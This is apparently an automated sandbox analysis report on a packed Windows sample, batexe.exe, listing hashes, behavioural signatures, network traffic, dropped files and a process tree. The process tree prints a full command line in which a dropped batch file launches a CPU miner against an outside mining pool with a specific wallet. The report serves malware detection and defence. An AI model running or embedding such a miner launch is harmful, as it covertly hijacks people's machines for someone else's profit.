73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
306s
max time network
329s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 23:57 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3480	b2e.exe
4064	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4064	cpuminer-sse2.exe
4064	cpuminer-sse2.exe
4064	cpuminer-sse2.exe
4064	cpuminer-sse2.exe
4064	cpuminer-sse2.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3732-0-0x0000000000400000-0x000000000393A000-memory.dmp	upx
behavioral2/memory/3732-2-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3732 wrote to memory of 3480	3732	batexe.exe	79
PID 3732 wrote to memory of 3480	3732	batexe.exe	79
PID 3732 wrote to memory of 3480	3732	batexe.exe	79
PID 3480 wrote to memory of 464	3480	b2e.exe	80
PID 3480 wrote to memory of 464	3480	b2e.exe	80
PID 3480 wrote to memory of 464	3480	b2e.exe	80
PID 464 wrote to memory of 4064	464	cmd.exe	83
PID 464 wrote to memory of 4064	464	cmd.exe	83

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3732
- C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5951.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4064

Network

DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response

10.127.0.1:12000

46 B
40 B
1
1
198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

4.0kB
5.8kB
48
49
127.0.0.1:60197

cpuminer-sse2.exe
127.0.0.1:60199

cpuminer-sse2.exe

8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe

Filesize
2.3MB

MD5
1242a52495577a4a5eff2cf661dcd0d4

SHA1
c1bb08a250714f5b5ce758b93255a85b0e7340ab

SHA256
1d5e526c1a5b905001ae700a552576a558bfbb0ea9b023e52bc73d43e8d603b8

SHA512
fa29f21c0ee78d7c22ae7fc735c2f9ee1c19770fcd76911a12ffc9c3762cbb62bfc93d3c1a3ed99fd508aed620bf18e270cf5f557cdb2dcbe6e42ee443f15074

Download Submit
C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe

Filesize
21.8MB

MD5
745a18d569de0f3cbb9dcaa7a633dc55

SHA1
146d04747653afd3e1ebc411de9a2b18e5a4e322

SHA256
302363698b5cffbed1fc9c8283dab4cfdbe96cb801a08905fe572898081bdede

SHA512
6e49b2eb6693d19639a071b9f2ba1bd9dd617a79fdd9b8e8da4af6f5433de0a100a36786f4c89492f8e6609bf7b2b4b5b6eb084d408356e40f2a4b98fac5941a

Download Submit
C:\Users\Admin\AppData\Local\Temp\135F.tmp\b2e.exe

Filesize
2.6MB

MD5
88729ff7c15c1901be34ae80c5015a23

SHA1
992a6fbba92aa358aff4ac03d9ff5561abf53aed

SHA256
5ae0e2fc36fb2672c9528b6db461eb95dbda6086b6b999e1968f991a49d9fbc4

SHA512
783ebe24036e6bb72ef14ac202acbf28d9d81bfc202fd2862288050b4d452998c6ad9ffc3dad840b242370306acf1adfbbef5dc19a22e12692b1ddeeb1ae571d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5951.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
697KB

MD5
6eae74a2022f1f612359fb7f0d78b2ac

SHA1
1112add86ad3487d4eed37de68444fbce67fecec

SHA256
6c60797b849a12c5fedd2c650ac71666ce2459c506865f3edc916377207bf2cd

SHA512
5a7920a836cd061ff9da3a606a60cc01770cff25f90fbc1d84ef437d6ea60d53ca722d087956ac901288ca98ba0d9918ae3864bae99490fff92f8b5f1968e0e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
634KB

MD5
55c0aa203fd21ce29c7449f11c803b46

SHA1
56c00f4838f00cb5245099fd94d9a6d6f149d3d3

SHA256
e9184d753f3cc9f8e354a8f8645e940e4820c26664737f16fbae3d83bfd21eb0

SHA512
e9c087739904520a4ccde0b395e66a10992bbabad16080a5565cf5ec46f77dc3f42d4cf8fc8c8da5e05c559ba41aff5be9289f1be80a80be5ee2a0276891ae49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
671KB

MD5
a0f5b9816d841ab5754a54e668e720c2

SHA1
a64bb14d1347ec7384b05576600234c901d563c1

SHA256
ac91ddcc49c21981aafe6a2a16e58b53273e1c56721734aefb480b3f76135215

SHA512
b42b4f2af52d95a34b38c0d283951375f3735b8eb8bcdc654b87cb8a52ba67eb7d59f91cbb073c7b860efdc7b76dc6dfff5da4e0cf5497f52864a096f3ddc3e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
699KB

MD5
fb54f0ed1c074bd141eb3ae3438f066f

SHA1
38a940cef4f1cb8976d921184ee820e36eae327f

SHA256
692ac25c3a7c709b34053df79617dd84dde9b36ffa52e7b2764283539732f8e5

SHA512
64b39cc8e4142f64fd0a6683af7172bf9a340587e617d2622def8cb1346dde416ec78fd81e1b401d99334feeebeed4a70836f287883dc3a0a9d897a497a9f279

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
492KB

MD5
e22fc45d1f82baac0f6f8922a2b7b079

SHA1
4a1a0221712f8f5672887ae05406496d203350d4

SHA256
bfa1ee632cb93a7a6315faa674c88fbb613d45630bb0e6439c60f739a368113b

SHA512
a6ff16934701b914dd39ab7c925883cd19215edf78e4301c39e064d2e6be362503292aa75e580aacf63fa79c809ec26d9037f39e278313ad2e9feddc8c98a80a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
734KB

MD5
7b2c771657e7ee8be8c4c50cc481092f

SHA1
290548c192db2d0a6ce6c1d8b04d137c34ee44f7

SHA256
3704bbe530a45ab2061da174f4a2d5ebb9d9a12bfee3bd38796f525b5e8790fe

SHA512
1f79ae197a816110fc54618e0eb13f9c636d77d1ac3b5374a2c5f549818507173ec327345133c8a05aaf2cd3e6ed9c331f13410ba5b57f0f17d7629e26f1daf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
648KB

MD5
8336d345b7eabb833f011e5c655327b6

SHA1
a2cec66692308e517e0aa7abd01d9d233d7f1806

SHA256
1c833c7fba4cc599d61e6571837a8f2954c4704ed5566bcc82d079f7477e5f9b

SHA512
2b35c6eaa36f731366f134568269647d10125c597bff7c356fccca2cce60e5ca0dc37dac7b74b9dad1748c11a8d2e9bf8b44d43c4e584a73ac1e0c52b57cf218

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
567KB

MD5
19f23de3e425e41085abb814e2e7e4f4

SHA1
81e956e6dc983c3ad93be3204fcefb800b16fb7a

SHA256
983fb038e76096b9362bcb3d3d5c82d1648ea8539202a576ed8917da40e10f3b

SHA512
72590fa4e5cb7e90e8df52be260bce3566ad70f3ad830aedfc6e671ea37cad6bcbe0cb102d29a9779ee09d567aa8e13f42cf71dcd74f48db732c81327e2379d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
677KB

MD5
4ba4acb2c6e69cd2ba7d487c597b563c

SHA1
49ca61da853be38e04af647168edf3fd445315b4

SHA256
6a212d38b5406098bd01305f588e1ca2ad1c63e4355b31c108507efccd2f8f15

SHA512
fbb457938fdc3c82270e759fa47b6ccd8a238cee3230b3dca90f5f4e0ee504adc75fe3cf8a6db714c2c9b73ea338fe3abb326b5a5eb1471b930c6f254509de13

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
384KB

MD5
ae9cddd460812df42b98d21f8ac06e17

SHA1
6c32cd0036f82bc9edb7dd9f063a98b87d13fef3

SHA256
a4b459e329b2e6617a6aadc8d7e7652f127f5e666e632dac31f0463693532da1

SHA512
fe5931477df18990cb706106a3448066837379b94cd858d476610e537d629eefa6708bdd8bcd3fd17efb9629e79fee4ede4b7cdeb795e74daed978c67133e2ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3480-11-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3480-56-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3732-0-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3732-2-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4064-49-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4064-67-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-47-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4064-50-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/4064-46-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-57-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-62-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-48-0x00000000744D0000-0x0000000074568000-memory.dmp

Filesize
608KB

Download
memory/4064-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4064-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.